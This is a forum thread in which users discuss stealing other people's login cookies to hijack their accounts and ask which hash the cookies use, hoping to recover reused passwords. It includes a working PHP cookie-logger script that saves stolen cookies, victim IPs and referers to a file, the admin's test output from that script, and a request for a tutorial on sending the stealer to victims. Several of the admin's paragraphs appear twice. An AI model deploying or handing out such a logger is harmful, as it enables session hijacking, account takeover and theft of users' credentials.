So, there are a lot of cookie-stealing scripts on the net. When i stole one of them, i see something like it: (my sx"s login cookie, with changed hash of course) sethioz_has_you:743.cae34a198d2d4f9c75uy84618gd94dc or like ...index.php?=4372fd%blahblah%24blah
Well, i can put it in my browser"s cookie and get a log-in. But i still dont know the password(Its important to know because 85% of people always using the same password for everything), so my question: which crypt method it is usually using? Are there any real point at all 2 steal cookies?
Cookie stealer(s)
- Sethioz
- Admin
- Posts: 4762
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: Cookies?
first of, could you post the script/s you used ? because so far i have never found a working cookie stealer, would like to test it.
looks like it is md5 hash. im not 100% sure how cookies work, well i know how they work, but that hash is not the actual password, it is something like session id, only that it never changes (on some sites). which means that you can't get the original password if you steal the cookie. This is the reason why most sites ask you for the original password if you want to change any settings or log into admin panel, because if you steal cookie, you can do most things, but you can't change password or access admin panel.
some sites maybe use actual md5 hash of password as cookie, but i highly doubt. you can easily test, by logging in, checking the cookie hash, then you use passwords pro or any other tool like it and put your password in there and see what is the md5 hash of it, if its same, then it really uses password hash as cookie.
looks like it is md5 hash. im not 100% sure how cookies work, well i know how they work, but that hash is not the actual password, it is something like session id, only that it never changes (on some sites). which means that you can't get the original password if you steal the cookie. This is the reason why most sites ask you for the original password if you want to change any settings or log into admin panel, because if you steal cookie, you can do most things, but you can't change password or access admin panel.
some sites maybe use actual md5 hash of password as cookie, but i highly doubt. you can easily test, by logging in, checking the cookie hash, then you use passwords pro or any other tool like it and put your password in there and see what is the md5 hash of it, if its same, then it really uses password hash as cookie.
-
- Allie
- Posts: 105
- Joined: Tue Jan 12, 2010 2:59 pm
Re: Cookies?
Code: Select all
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br>
IP: ' .$ip. '<br>
Date/Time: ' .$date. '<br>
Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
- Sethioz
- Admin
- Posts: 4762
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: Cookie stealer(s)
well it works, but it only logs unnecessary info
it doesn't save the actual cookie. if you find the one that saves the actual cookie, we can go on with it.
Code: Select all
Cookie:
IP: 127.0.0.1
Date/Time: 27 May, 2010, 9:56 pm
Referer: http://sethioz.co.uk/
Re: Cookie stealer(s)
hi
can any one please give us a small tutorial on how we can use the cookie stealer
how we send it to the victim
how we get back the information
all the stuff please >>>
thanks Sethioz
can any one please give us a small tutorial on how we can use the cookie stealer
how we send it to the victim
how we get back the information
all the stuff please >>>
thanks Sethioz
- Sethioz
- Admin
- Posts: 4762
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: Cookie stealer(s)
i aint got working one. ive been after one myself in fact.
There's a working cookie stealer in this thread:
http://sethioz.com/forum/viewtopic.php?f=47&t=986
further discussion goes there
CLOSED
There's a working cookie stealer in this thread:
http://sethioz.com/forum/viewtopic.php?f=47&t=986
further discussion goes there
CLOSED